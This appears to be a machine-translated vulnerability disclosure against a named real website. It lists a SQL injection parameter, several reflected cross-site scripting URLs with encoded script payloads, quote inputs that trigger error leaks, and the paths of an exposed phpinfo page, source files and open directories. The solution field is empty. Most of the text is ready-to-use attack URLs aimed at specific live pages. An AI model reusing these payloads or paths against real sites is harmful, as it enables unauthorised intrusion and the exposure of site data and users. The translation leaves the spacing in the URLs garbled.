SQL Injection, cross-site or something ..
Description: 1. SQL Injection
Inject URL: http://www.alixiaoyuan.com/index.php? App = campusgroupbuy & cateID = 1
Injection parameter: cateID
2. Cross-Site
Http://wh.alixiaoyuan.com /? App = buy & city_id = % 22% 20 onmouseover % 3 dprompt % 28970140% 29% 20bad % 3d % 22 & group_id = 17
Http://wh.alixiaoyuan.com /? Address = % E6 % B1 % 9F % E5 % AE % 81% E5 % 8C % BA % E5 % 8F % 8C % E9 % BE % 99% E5 % A4 % A7 % E9 % 81% 93 & app = store_map & id = 62 & map = 118.785401, 32.000455 & sname = store & store_name = % 27% 22% 28% 29% 26% 251% 3 cScRiPt % 20% 3 eprompt % 28997246% 29% 3c % 2 fScRiPt % 3e
Http://wh.alixiaoyuan.com/index.php? Act = index & app = search & keyword = 1 & searchBtn = 1 & type = % 27% 22% 28% 29% 26% 251% 3 cScRiPt % 20% 3 eprompt % 28973765% 29% 3c % 2 fScRiPt % 3e
Http://wh.alixiaoyuan.com/index.php? App = campusgroupbuy & cateID = % 27% 22% 28% 29% 26% 251% 3 cScRiPt % 20% 3 eprompt % 28964089% 29% 3c % 2 fScRiPt % 3e
3. Sensitive Information Leakage
Http://www.alixiaoyuan.com /? App = buy & city_id = 1' & group_id = 17
Http://www.alixiaoyuan.com/index.php? App = campusgroupbuy & cateID = 1% 27% 22
Http://www.alixiaoyuan.com /? App = buy & city_id = 1% 27% 22 & group_id = 17
Http://www.alixiaoyuan.com/external/modules/datacall/module.info.php
.....................................
4. phpinfo
Http://www.alixiaoyuan.com/info.php
5. Source Code Leakage
Http://www.alixiaoyuan.com/phpmyadmin/scripts/upgrade.pl
Http://www.alixiaoyuan.com/themes/mall/default/styles/default/images/member/thumbs.db
Http://www.alixiaoyuan.com/themes/store/default/groupbuy.index.html
6. Directory Leakage
Http://www.alixiaoyuan.com/api/
Http://www.alixiaoyuan.com/data/
Http://www.alixiaoyuan.com/data/files
.....................
Solution:
=-= ~